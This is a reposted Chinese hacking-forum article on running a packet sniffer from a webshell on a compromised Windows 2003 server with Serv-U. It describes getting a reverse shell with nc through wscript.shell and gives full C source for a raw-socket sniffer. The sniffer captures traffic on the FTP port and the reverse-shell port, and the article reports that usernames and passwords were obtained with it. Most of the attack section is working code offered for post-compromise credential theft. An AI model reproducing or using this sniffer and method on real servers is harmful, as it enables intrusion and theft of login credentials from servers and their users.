分享
 
 
 

基于Webshell的sniffer可行性研究

王朝other·作者佚名  2008-05-19
窄屏简体版  字體: |||超大  

前言:

幻影Mix修改的flashsky的那个端口复用下的嗅探serv-u,经测试,不能用于win2003服务器中,具体我也不知道,不知道是不是操作有识,反正我是没成功过.

我自己构造了一个环境试了一下,嗅探程序是自己写的,利用raw进行嗅探,如果要arp的话,要装那个wincap,想一想那么低的权限是不可能的.

实验环境:

Windows2003服务器+海洋2006+serv-u5.2

服务器不能直接使用cmd.exe,但可以上传后利用wscript.shell组件执行命令.

实验步骤:

1.利用wcript.shell执行nc 反弹得到shell

screen.width-460)this.width=screen.width-460;" border=0 twffan="done" onclick="if(this.widthscreen.width-461) window.open('/news/UploadFiles_9994/200601/20060115021853730.jpg');"

2.利用自编写工具进行嗅探(我只嗅探21和9001,其中21为ftp,9001为反弹端口)

CODE:

/*------------------------------------------------------

*file: SnifferFtp.c

*Effect: 用于在webshell进行嗅探实验之用,基于Raw

*Code: Huai_Huai

*Page: Http://hhuai.cn

*Date: 2006.1.12

*-----------------------------------------------------*/

#include

#include

#include "Winsock2.h"

#pragma comment(lib,"WS2_32.lib")

#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)

#define STATUS_FAILED 0xFFFF

#define MAX_PACK_LEN 65535

#define MAX_ADDR_LEN 16

#define MAX_HOSTNAME_LEN 255

//定义ip报头

typedef struct _iphdr

{

byte ver_len; //版本4位,头长度4位,报头长度以32位为一个单位

byte type; //类型8位

byte length[2]; //总长度,16位,指出报文的以字节为单位的总长度

//报文长度不能超过65536个字接,否则认为报文遭到破坏

byte id[2]; //报文标示,用于多于一个报文16位

byte flag_offset[2];//标志,3位 数据块偏移13位

byte time; //生存时间,8位

byte protocol; //协议,8位

byte crc_val[2]; //头校验和,16位

byte src_addr[4]; //源地址,32位

byte tar_addr[4]; //目标地址,32位

byte options[4]; //选项和填充,32位

}IP_HEADER;

typedef struct _tcphdr

{

byte source_port[2]; //发送端端口号,16位

byte dest_port[2]; //接收端端口号,16位

byte sequence_no[4]; //32位,标示消息端的数据位于全体数据块的某一字节的数字

byte ack_no[4]; //32位,确认号,标示接收端对于发送端接收到数据块数值

unsigned char offset_reser_con;//数据偏移4位,预留6位,控制位6为

unsigned char th_flag;

byte window[2]; //窗口16位

byte checksum[2]; //校验码,16位

byte urgen_pointer[2]; //16位,紧急数据指针

byte options[3]; //选祥和填充,32位

}TCP_HEADER;

#define PROTOCOL_ICMP 1 //传输控制协议

#define PROTOCOL_GTG 3 //Gateway-to-Gateway

#define PROTOCOL_CGMM 4 //CMCC Gateway Monitoring Message

#define PROTOCOL_ST 5 //ST

#define PROTOCOL_TCP 6 //传输控制协议

#define PROTOCOL_UCL 7 //UCL

#define PROTOCOL_SECURE 9 //secure

#define PROTOCOL_BRM 10 //BBN RCC Monitoring

#define PROTOCOL_NVP 11 //NVp

#define PROTOCOL_PUP 12 //PUP

#define PROTOCOL_PLURIBUS 13 //Pluribus

#define PROTOCOL_TELENET 14 //Telenet

#define PROTOCOL_XNET 15 //XNET

#define PROTOCOL_CHAOS 16 //Chaos

#define PROTOCOL_UDP 17 //UDP

#define PROTOCOL_MULTIPLEXING 18 //Multiplexing

#define PROTOCOL_DCN 19 //DCN

#define PROTOCOL_TAC_MONITORING 20 //TAC Monitoring

#define PROTOCOL_ALN 63 //any local network

#define PROTOCOL_SATNET 64 //SATNET and Backroom EXPAK

#define PROTOCOL_MITSS 65 //MIT Subnet Support

#define PROTOCOL_SATNET_MONIT 69 //SATNET Monitoring

#define PROTOCOL_IPCU 71 //Internet Packet Core Utility

#define PROTOCOL_BK_SATNET_MONI 76 //Backroom SATNET Monitoring

#define PROTOCOL_WIDEBAND_MONI 78 //WIDEBAND Monitoring

#define PROTOCOL_WIDEBAND_EXPAK 79 //WIDEBAND EXPAK

SOCKET SocketRaw;

void startsniffer()

{

char RecvBuf[MAX_PACK_LEN]={0};

char FAR name[MAX_HOSTNAME_LEN];

WSADATA wsa;

struct hostent FAR* pHostent;

SOCKADDR_IN sa;

DWORD OutBuffer[10];

DWORD InBuffer=1;

DWORD BytesReturned=0;

if(WSAStartup(MAKEWORD(2,2),&wsa)!=0)

{

printf("不能加载Winsock DLL!");

exit(0);

}

SocketRaw=socket(AF_INET,SOCK_RAW,IPPROTO_IP);

if(SocketRaw==INVALID_SOCKET)

{

printf("不能创建Socket!");

exit(0);

}

gethostname(name,MAX_HOSTNAME_LEN);

//这里会自动分配内存

pHostent=gethostbyname(name);

sa.sin_family=AF_INET;

sa.sin_port=htons(6000);

memcpy(&sa.sin_addr.S_un.S_addr,pHostent->h_addr_list[0],

pHostent->h_length);

if(bind(SocketRaw,(PSOCKADDR)&sa,sizeof(sa))!=0)

{

printf("不能绑定网卡!");

closesocket(SocketRaw);

exit(0);

}

if(WSAIoctl(SocketRaw,SIO_RCVALL,&InBuffer,sizeof(InBuffer),

&OutBuffer,sizeof(OutBuffer),&BytesReturned,NULL,NULL)!=0)

{

printf("不能创建WSAIoctl!");

closesocket(SocketRaw);

exit(0);

}

}

int ReceiveBuf(byte* buf,int len)

{

return recv(SocketRaw,(char *)buf,len,0);

}

void main()

{

int len;

byte RecvBuf[65535];

char buf[16];

int iphdr_len;

TCP_HEADER* pTcpHeader;

unsigned __int16 src_port;

unsigned __int16 dest_port;

int HdrLen;

__int16 datalen;

IP_HEADER* pIpheader;

int port1,port2;

startsniffer();

while(TRUE)

{

port1=port2=0;

memset(RecvBuf,0,65535);

len=ReceiveBuf(RecvBuf,65535);

if(len>0)

{

pIpheader=(IP_HEADER*)RecvBuf;

/*

switch(pIpheader->protocol)

{

case PROTOCOL_ICMP:

printf("ICMP");

break;

case PROTOCOL_TCP:

printf("TCP");

break;

case PROTOCOL_UDP:

printf("UDP");

break;

default:

printf("其他协议");

break;

}

*/

if(pIpheader->protocol==PROTOCOL_TCP)

{

iphdr_len=(pIpheader->ver_len&0xf)*4;

pTcpHeader=(TCP_HEADER*)(RecvBuf+iphdr_len);

src_port=pTcpHeader->source_port[0]

*0x100+pTcpHeader->source_port[1];

dest_port=pTcpHeader->dest_port[0]

*0x100+pTcpHeader->dest_port[1];

memset(buf,0,16);

sprintf(buf,"%d",src_port);

port1=src_port;

//printf("%s ",buf);

memset(buf,0,16);

sprintf(buf,"%d",dest_port);

port2=dest_port;

//printf("%s ",buf);

if(port1==21 || port2==21 || port1==9001 || port2==9001)

{

HdrLen=(pTcpHeader->offset_reser_con)>>2;

memset(buf,0,16);

sprintf(buf,"%s",((BYTE *)pTcpHeader)+HdrLen);

//printf("%s ",buf);

memset(buf,0,16);

sprintf(buf,"%d.%d.%d.%d",pIpheader->src_addr[0],

pIpheader->src_addr[1],pIpheader->src_addr[2],

pIpheader->src_addr[3]);

//printf("%s ",buf);

memset(buf,0,16);

sprintf(buf,"%d.%d.%d.%d",pIpheader->tar_addr[0],

pIpheader->tar_addr[1],pIpheader->tar_addr[2],

pIpheader->tar_addr[3]);

//printf("%s ",buf);

datalen=pIpheader->length[0]

*0x100+pIpheader->length[1];

memset(buf,0,16);

sprintf(buf,"%d",datalen);

//printf("%s ",buf);

HdrLen=(pTcpHeader->offset_reser_con)>>2;

memset(buf,0,16);

sprintf(buf,"%s",((BYTE *)pTcpHeader)+HdrLen);

printf("%s",buf);

//printf("\n");

}

}

}

}

}

3.嗅探结果:

screen.width-460)this.width=screen.width-460;" border=0 twffan="done" onclick="if(this.widthscreen.width-461) window.open('/news/UploadFiles_9994/200601/20060115021859143.jpg');"

4.实验小结:

确实可以嗅到一些信息,在本机winxp sp2可以嗅到ftp密码,但在win2003服务器上运行,就只能嗅到用户名,利用webshell执行的也可以嗅到用户名,一些操作,比如用户目录什么的.

我们的webshell权限可以非常的低,只要能利用wscript.shell就行.

其中有许多细节,需以后仔细的研究,万望论坛的高手能给予一点提示.

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有